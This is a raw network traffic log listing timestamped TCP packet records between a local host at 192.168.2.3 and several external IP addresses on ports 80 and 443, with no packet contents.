Jun 21, 2023 04:27:51.201747894 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201759100 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201795101 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201839924 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201848030 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201886892 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201936960 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.201952934 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.201982021 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202028036 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202033043 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.202073097 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202117920 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202125072 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.202163935 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202208996 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202224016 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.202255011 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202301979 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202311039 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.202347040 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.202397108 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267059088 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267132998 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267179966 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267247915 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267271996 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267294884 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267322063 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267340899 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267386913 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267396927 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267431974 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267477989 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267524958 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267541885 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267570972 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267580986 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267616987 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267666101 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267688036 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267712116 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267756939 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267770052 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267802954 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267849922 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267862082 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267899990 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267951012 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.267968893 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.267997980 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268044949 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268054962 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268091917 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268136978 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268148899 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268182993 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268228054 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268239021 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268300056 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268345118 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268368006 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268389940 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268434048 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268445969 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268476963 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268518925 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268531084 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268563986 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268605947 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268620014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268668890 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268712044 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268722057 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268754005 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268800020 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268809080 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268843889 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268888950 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268903017 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.268937111 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268981934 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.268995047 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269026995 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269073009 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269084930 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269118071 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269162893 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269171953 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269207954 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269253016 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269264936 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269299030 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269344091 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269356012 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269391060 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269435883 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269448996 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269480944 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269526005 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269536972 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269571066 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269615889 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269624949 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269670010 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269714117 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269726038 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269758940 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269804955 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269829988 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269848108 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269893885 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269907951 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.269939899 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269979000 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.269995928 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270024061 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270067930 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270081043 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270112991 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270157099 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270169973 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270201921 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270247936 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270256042 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270293951 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270365953 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270406961 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270411968 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270457983 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270474911 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270503044 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270549059 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270565033 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270591974 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270637035 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270644903 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270680904 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270725965 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270739079 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270771980 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270817041 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270843983 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270860910 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270906925 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270922899 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.270951986 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.270997047 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271007061 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271040916 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271085978 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271090031 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271131992 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271174908 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271186113 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271219969 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271265030 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271272898 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271308899 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271353960 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271356106 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271398067 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271441936 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271450996 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271487951 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271532059 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271539927 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271576881 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271621943 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271631956 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271667004 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271709919 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271717072 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271754026 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271799088 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271805048 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271845102 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271892071 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271900892 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.271939993 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271985054 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.271991014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.272030115 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272073984 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272082090 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.272118092 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272164106 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272166014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.272208929 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272253036 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272277117 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.272320032 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272367001 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272377014 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.272413015 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.272475958 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.301541090 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:51.353101015 CEST	49717	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:51.404288054 CEST	80	49717	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:51.404433012 CEST	49717	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:51.938060045 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:51.938231945 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:52.283039093 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:52.283211946 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:52.535042048 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:52.535089016 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:52.535200119 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:52.782660961 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:52.782702923 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:52.782731056 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:52.782757998 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:52.782774925 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:52.782836914 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:52.782836914 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:52.918318987 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:52.918395996 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:52.999104977 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:52.999296904 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.029937029 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030025959 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030119896 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.030179024 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.030222893 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030272007 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030277967 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.030328989 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.030411959 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030474901 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030474901 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.030517101 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030529022 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.030566931 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.030572891 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.030615091 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.038856983 CEST	49717	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:53.053586006 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.053632021 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:53.054461956 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:53.054558992 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.057168007 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.097176075 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:53.097274065 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.097325087 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:53.097381115 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:53.097388029 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.097446918 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.186554909 CEST	80	49717	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:53.186616898 CEST	80	49717	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:53.186655998 CEST	49717	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:53.186718941 CEST	49717	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:53.232214928 CEST	49716	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:53.232256889 CEST	443	49716	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:53.277436972 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277523994 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277540922 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.277574062 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277618885 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.277620077 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277671099 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.277671099 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.277748108 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277793884 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277821064 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.277854919 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.277861118 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277900934 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.277981043 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.277981043 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.369378090 CEST	49712	80	192.168.2.3	123.140.161.243
Jun 21, 2023 04:27:53.443027973 CEST	49717	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:53.493643045 CEST	80	49717	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:53.616684914 CEST	80	49712	123.140.161.243	192.168.2.3
Jun 21, 2023 04:27:53.666491985 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:53.683722019 CEST	80	49709	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:53.683815956 CEST	49709	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:53.730963945 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:53.747987032 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:53.748123884 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:53.748590946 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:53.748630047 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:53.765558958 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:53.765633106 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:53.875874043 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:53.875947952 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:53.876034975 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:54.250395060 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:54.250488997 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:54.267555952 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:54.267610073 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:54.330894947 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:54.330986977 CEST	80	49718	188.114.96.7	192.168.2.3
Jun 21, 2023 04:27:54.331121922 CEST	49718	80	192.168.2.3	188.114.96.7
Jun 21, 2023 04:27:54.417256117 CEST	49719	80	192.168.2.3	45.9.74.80
Jun 21, 2023 04:27:56.138562918 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.138647079 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.138772011 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.180567026 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.180629015 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.215176105 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.215229034 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.215400934 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.259825945 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.262383938 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.298403978 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.298469067 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.299200058 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.299320936 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.329420090 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.337208033 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.375901937 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.376332998 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.378664970 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.378796101 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.380381107 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.385760069 CEST	49720	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.385796070 CEST	443	49720	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.390887022 CEST	49722	80	192.168.2.3	77.28.83.241
Jun 21, 2023 04:27:56.415741920 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.415796041 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.494101048 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.496684074 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.507961035 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.507992983 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.508429050 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.508510113 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.510624886 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.552313089 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.561322927 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.561455965 CEST	443	49721	162.0.217.254	192.168.2.3
Jun 21, 2023 04:27:56.561564922 CEST	49721	443	192.168.2.3	162.0.217.254
Jun 21, 2023 04:27:56.627640963 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.627701998 CEST	80	49722	77.28.83.241	192.168.2.3
Jun 21, 2023 04:27:56.627808094 CEST	49722	80	192.168.2.3	77.28.83.241
